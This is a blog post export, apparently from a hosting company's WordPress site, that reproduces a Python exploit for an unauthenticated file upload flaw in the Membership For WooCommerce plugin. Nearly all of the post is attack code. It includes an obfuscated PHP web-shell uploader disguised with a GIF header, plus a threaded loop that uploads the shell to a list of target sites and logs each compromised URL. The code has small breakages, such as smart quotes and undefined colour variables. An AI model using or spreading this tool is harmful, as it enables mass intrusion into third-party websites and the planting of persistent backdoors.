# Exploit Title: Wordpress Plugin – Membership For WooCommerce < v2.1.7 – Arbitrary File Upload to Shell (Unauthenticated)
# Date: 2024-02-25
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox<\/p>\n
import sys , requests, re , json
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)<\/p>\n
headers = {‘Connection’: ‘keep-alive’, ‘Cache-Control’: ‘max-age=0’,
‘Upgrade-Insecure-Requests’: ‘1’, ‘User-Agent’: ‘Mozlila\/5.0 (Linux;
Android 7.0; SM-G892A Bulid\/NRD90M; wv) AppleWebKit\/537.36 (KHTML, like
Gecko) Version\/4.0 Chrome\/60.0.3112.107 Moblie Safari\/537.36′, ‘Accept’:
‘text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8’,
‘Accept-Encoding’: ‘gzip, deflate’, ‘Accept-Language’:
‘en-US,en;q=0.9,fr;q=0.8’, ‘referer’: ‘www.google.com’}<\/p>\n
uploader = “””
GIF89a
<?php ?>
<!DOCTYPE html>
<html>
<head>
<title>Resultz<\/title>
<\/head>
<body><h1>Uploader<\/h1>
<form enctype=’multipart\/form-data’ action=” method=’POST’>
<p>Uploaded<\/p>
<input type=’file’ name=’uploaded_file’><\/input><br \/>
<input type=’submit’ value=’Upload’><\/input>
<\/form>
<\/body>
<\/html>
<?PHP
if(!empty($_FILES[base64_decode(‘dXBsb2FkZWRfZmlsZQ==’)])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode(‘Li8=’);$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode(‘dXBsb2FkZWRfZmlsZQ==’)][base64_decode(‘bmFtZQ==’)]);if(move_uploaded_file($_FILES[base64_decode(‘dXBsb2FkZWRfZmlsZQ==’)][base64_decode(‘dG1wX25hbWU=’)],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echo
base64_decode(‘VGhlIGZpbGUg’).basename($_FILES[base64_decode(‘dXBsb2FkZWRfZmlsZQ==’)][base64_decode(‘bmFtZQ==’)]).base64_decode(‘IGhhcyBiZWVuIHVwbG9hZGVk’);}else{echo
base64_decode(‘VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=’);}}?>
“””
requests.urllib3.disable_warnings()<\/p>\n
def Exploit(Domain):
try:
if ‘http’ in Domain:
Domain = Domain
else:
Domain = ‘http:\/\/’+Domain
myup = {”: (‘db.php’, uploader)}
req = requests.post(Domain +
‘\/wp-admin\/admin-ajax.php?action=wps_membership_csv_file_upload’,
files=myup, headers=headers,verify=False, timeout=10).text
req1 = requests.get(Domain +
‘\/wp-content\/uploads\/mfw-activity-logger\/csv-uploads\/db.php’)
if ‘Ex3ptionaL’ in req1:
print (fg+'[+] ‘+ Domain + ‘ –> Shell Uploaded’)
open(‘Shellz.txt’, ‘a’).write(Domain +
‘\/wp-content\/uploads\/mfw-activity-logger\/csv-uploads\/db.php’ + ‘\\n’)
else:
print (fr+'[+] ‘+ Domain + ‘{}{} –> Not Vulnerability’)
except:
print(fr+’ -| ‘ + Domain + ‘ –> {} [Failed]’)<\/p>\n
target = open(input(fm+”Site List: “), “r”).read().splitlines()
mp = Pool(int(input(fm+”Threads: “)))
mp.map(Exploit, target)
mp.close()
mp.join()<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: Wordpress Plugin – Membership For WooCommerce < v2.1.7 – Arbitrary File Upload to Shell (Unauthenticated)# Date: 2024-02-25# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefox import sys , requests, re , jsonfrom multiprocessing.dummy import Poolfrom colorama import Forefrom colorama import initinit(autoreset=True) headers = {‘Connection’: ‘keep-alive’, ‘Cache-Control’: ‘max-age=0’,‘Upgrade-Insecure-Requests’: …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56090","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56090","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56090"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56090\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56090"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56090"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56090"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}